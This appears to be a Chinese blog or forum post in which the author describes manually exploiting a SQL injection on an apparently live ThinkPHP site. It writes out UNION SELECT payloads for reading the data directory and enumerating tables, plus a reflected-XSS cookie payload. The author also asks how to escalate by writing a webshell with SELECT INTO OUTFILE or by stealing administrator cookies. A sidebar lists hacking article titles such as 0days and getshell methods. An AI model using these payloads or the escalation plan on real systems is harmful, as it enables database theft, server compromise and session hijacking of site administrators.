当前位置: 首页 > news >正文

thinkphp框架下mysql注入

作者:tnt1200

Wamp环境,用thinkphp框架制作,手工检测发现一个注入点。

1 /content/117 and 1=2 union select @@datadir,2,3,4,5,6

20130123145103

 

这个注入点同时还是一个反射型xss,id值被写入到了内联js里。

20130123145325

 

接着提交
and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=(hex值)
返回空白,查看源代码发现”.”之后的语句被截断了。

20130123145408

 

现在有几个思路,求指点
1.构造特殊语句,使语句中不出现”.”。
2.通过Select into outfile导出webshell。但由于框架问题”/”和”\”都被认为是目录。
3.构造xss获取管理员cookies。

1 eg:/content/117;alert(document.cookie)

 

相关文章:

  • dedecms最新注入分析(可过gpc)
  • 过安全狗技术总汇
  • 建站之星最新0DAY
  • 最土团购网盲注n枚
  • MyBB plugin SQLi 0day
  • 使用HTTP_X_FORWARDED_FOR获取客户端IP的严重后果
  • ownCloud 开源云数据存储平台
  • PHPCMS v9 Getshell(Apache)
  • 从MSSQL里执行命令导出为MDF
  • load_file()常用路径
  • 计算机网络的分层体系结构
  • windows 环境变量被改变了,不能使用cmd ?怎么办?
  • Ubuntu命令大合集
  • JDK1.6在LINUX下的安装配置
  • 配置squid 反向代理提高网站性能
  • Android系统模拟器绘制实现概述
  • C++回声服务器_9-epoll边缘触发模式版本服务器
  • echarts的各种常用效果展示
  • HTML-表单
  • Java 最常见的 200+ 面试题:面试必备
  • laravel with 查询列表限制条数
  • leetcode98. Validate Binary Search Tree
  • MaxCompute访问TableStore(OTS) 数据
  • Mysql数据库的条件查询语句
  • python学习笔记-类对象的信息
  • SAP云平台运行环境Cloud Foundry和Neo的区别
  • vue总结
  • zookeeper系列(七)实战分布式命名服务
  • 表单中readonly的input等标签,禁止光标进入(focus)的几种方式
  • 等保2.0 | 几维安全发布等保检测、等保加固专版 加速企业等保合规
  • 浅谈Golang中select的用法
  • 物联网链路协议
  • 赢得Docker挑战最佳实践
  • LIGO、Virgo第三轮探测告捷,同时探测到一对黑洞合并产生的引力波事件 ...
  • mysql 慢查询分析工具:pt-query-digest 在mac 上的安装使用 ...
  • ​3ds Max插件CG MAGIC图形板块为您提升线条效率!
  • #100天计划# 2013年9月29日
  • #DBA杂记1
  • (01)ORB-SLAM2源码无死角解析-(56) 闭环线程→计算Sim3:理论推导(1)求解s,t
  • (4)事件处理——(2)在页面加载的时候执行任务(Performing tasks on page load)...
  • (转)Linux整合apache和tomcat构建Web服务器
  • (转)甲方乙方——赵民谈找工作
  • (总结)Linux下的暴力密码在线破解工具Hydra详解
  • .dat文件写入byte类型数组_用Python从Abaqus导出txt、dat数据
  • .equals()到底是什么意思?
  • .NET 中选择合适的文件打开模式(CreateNew, Create, Open, OpenOrCreate, Truncate, Append)
  • .NET6 开发一个检查某些状态持续多长时间的类
  • .net6Api后台+uniapp导出Excel
  • @column注解_MyBatis注解开发 -MyBatis(15)
  • @软考考生,这份软考高分攻略你须知道
  • [20150707]外部表与rowid.txt
  • [Android学习笔记]ScrollView的使用
  • [Angular 基础] - 自定义指令,深入学习 directive
  • [BUUCTF]-PWN:[极客大挑战 2019]Not Bad解析
  • [Editor]Unity Editor类常用方法